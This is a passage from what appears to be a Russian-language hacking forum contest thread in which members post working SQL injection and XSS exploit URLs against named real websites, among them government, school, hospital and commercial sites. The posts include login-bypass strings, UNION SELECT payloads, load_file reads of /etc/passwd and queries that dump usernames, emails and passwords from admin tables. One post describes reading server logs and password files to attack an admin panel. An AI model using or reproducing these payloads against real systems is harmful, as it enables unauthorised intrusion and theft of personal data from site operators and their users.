Значит остались самые трудные из списка: XXE и RCE + надо начинать усилено изучать PHP и SQL. Спасибо что поставили меня на путь праведный , а то так бы и продолжал морально разлагаться и в игрушки играть.
1)Сайт: http://dogarchive.kennel-apbt.com/ Уязвимость SQLi Эксплойт: http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php вписываем: логин - ' or 1=1# пароль - ' or 1=1 '# И видим снизу: Online registred users: admin и т.д 2) Сайт: http://lineforheaven.com/soul.php?id=174 Уязвимость: SQLi Эксплойт: http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33,34,35 -- 3)Сайт: https://www.harptabs.com Уязвимость: SQLi Эксплойт: https://www.harptabs.com/login.php Я нашел логин пользователя на сайте и вписал: Логин: Ceja8460' or 1=1# Пароль: Ceja8460' or 1=1 '# Зашло под логином: Welcome, Ceja8460' or 1=1# 4)Сайт: http://www.ibdb.com/search.php Уязвимость: XSS Эксплойт: http://www.ibdb.com/search.php в поле поиска вписываем: <script>alert('antichat.ru')</script> 5)Сайт: http://www.kpa.gov.my Уязвимость: XSS(в поиску), SQLi Єксплойт: http://www.kpa.gov.my/pages.php?mod=search_result SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка: http://www.kpa.gov.my/modules/web/page_print.php?id=
например, прочитать /etc/passwd. выложить полный запрос (можно перехватить через burp suite, например)
target: police.gov.bd type: SQL Injection version: 5.1.69 Code: http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
1) SQL в username, а не в поле пароля. admin'or(1)='1 123 2) ОК 3) Не смог разлогиниться, удаление куков не помогло. Тоже ошибся в каком-то из полей. 4) Наверное всё-таки не стоит указывать имя ресурса. Администрация уязвимого ресурса (а они смотрят логи), да и форума, скорее всего, не одобрит. 5) SQL Inj там нету. Ошибка из NULL в качестве значения переменной.
XSS уязвимость Code: http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22http://antichat.ru/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22%3E%3Cscript%3Ealert%28 /XSS/%29%3C/script%3E
Сайт: http://celtsat.com.br Уязвимость: SQL Injection Эксплоит: Code: http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.albit.com.au Уязвимость: SQL Injection Эксплоит: Code: http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: nijifan.com Уязвимость: SQL Injection Эксплоит: Code: http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.apva.org Уязвимость: SQL Injection Эксплоит: Code: http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.th.boots.com Уязвимость: SQL Injection Эксплоит: Code: http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.shanson.biz Уязвимость: SQL Injection Эксплоит: Code: http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.io-arch.com Уязвимость: SQL Injection Эксплоит: Code: http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.tokaiguitar.de Уязвимость: SQL Injection Эксплоит: Code: http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: islamic-wallpapers.com Уязвимость: SQL Injection Эксплоит: Code: http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.florentina.ro Уязвимость: SQL Injection Эксплоит: Code: http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.pronv.us Уязвимость: SQL Injection Эксплоит: Code: http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: ravco.jp Уязвимость: SQL Injection Эксплоит: Code: http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878-- Сайт: www.themasterswoodshop.com Уязвимость: SQL Injection Эксплоит: Code: http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:www.themasterswoodshop.com Уязвимость: Local File Reading Эксплоит: Code: http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4-- Сайт:www.io-arch.com Уязвимость: Local File Reading Эксплоит: Code: http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9-- Сайт:www.ravco.jp Уязвимость: Local File Reading Эксплоит: Code: http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20--
Сайт: http://www.thebandroom.biz/ Уязвимость: SQL Injection Эксплоит: Code: http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21 and '0'='0 Сайт:http://www.sacaindia.org/ Уязвимость: SQL Injection Эксплоит: Code: http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0 Сайт:http://www.offball.com/ Уязвимость: SQL Injection Эксплоит: Code: http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5 Сайт:http://www.coolncute.com/ Уязвимость: SQL Injection Эксплоит: Code: http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,14&sort=1 Сайт:http://www.damandiri.or.id/ Уязвимость: SQL Injection Эксплоит: Code: http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0 Сайт:http://www.begeerte.be/ Уязвимость: SQL Injection Эксплоит: Code: http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '0'='0 Сайт:http://www.hospitallocaldepiedecuesta.org/ Уязвимость: SQL Injection Эксплоит: Code: http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0 Сайт:http://www.etssp.com/ Уязвимость: SQL Injection Эксплоит: Code: http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- Сайт:http://www.worldbarefootcouncil.com/ Уязвимость: SQL Injection Эксплоит: Code: http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0 Сайт:http://www.kulmbacher-tierheim.de/ Уязвимость: SQL Injection Эксплоит: Code: http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
Code: http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,email),5,6,7,8,9,10,11,12+from+db_users+limit+2,1-- http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_ws(0x3a,id,email,password,admin_user_level_id,active),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1 И вот не докрутил тут, глянь, интересно что там http://integra.eu/press.cfm?id=327
Сайт: www.marcied.com Уязвимость: SQL Injection Эксплоит: Code: http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
добавил это добавил. это, скорее, sqli с правами на чтение, поэтому защитано как sqli. Добавил +28 очков добавил sqli гуглится, не добавлена.
тоже все добавил, вы проходите у нас уже трое человек попавших через конкурс, @Печа, @3nvY, @ocheretko
Сайт Украинского телеканала Code: http://www.hromadske.tv/search?s=%27;alert%28%27antichat%27%29;// Уязвимость интересна новичкам тем, что работает в Chrome - инжект в Javascript var stext1 = '';alert('antichat');//';
Сайт: www.gamagroupusa.com Уязвимость: Sql inj Code: http://www.gamagroupusa.com/index.php?i=1+union+select+1,2,3,version()+--+
Сайт: http://www.karmatube.org Уязвимость: XSS Эксплоит: Code: http://www.karmatube.org/videos.php?op=filter&cat=%253Cscript%253Ealert%28%25271%2527%29%253C/script%253E
http://www.sicb.org/ FILE_PRIV=Y 106 columns /etc/passwd: Code: http://www.sicb.org/meetings/2015/schedule/abstractdetails.php?id=199999997 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,load_file(0x2f6574632f706173737764),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106+from+mysql.user Методом ручного фазинга узнаем расположение логов. Читаем логи /var/log/httpd/error_log и видим расположение файлов веб-сервера в /var/www/html Читаем .htaccess админки из /var/www/html/admin/.htaccess: Читаем файл с паролем и брутим: Но фейл в админку не пускает, видимо фильтр по IP т.к. бейсик авторизацию уже мы проходим. PS БД очень большая в ней 9 БД и инфа начиная с 2002 года о студентах, докторах, профессорах. Дампить не стал.
Site: http://www.safetylit.org Уязвимость: SQL Injection Эксплоит: Code: http://www.safetylit.org/week/journalpage.php?jid=-1+UNION+SELECT+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+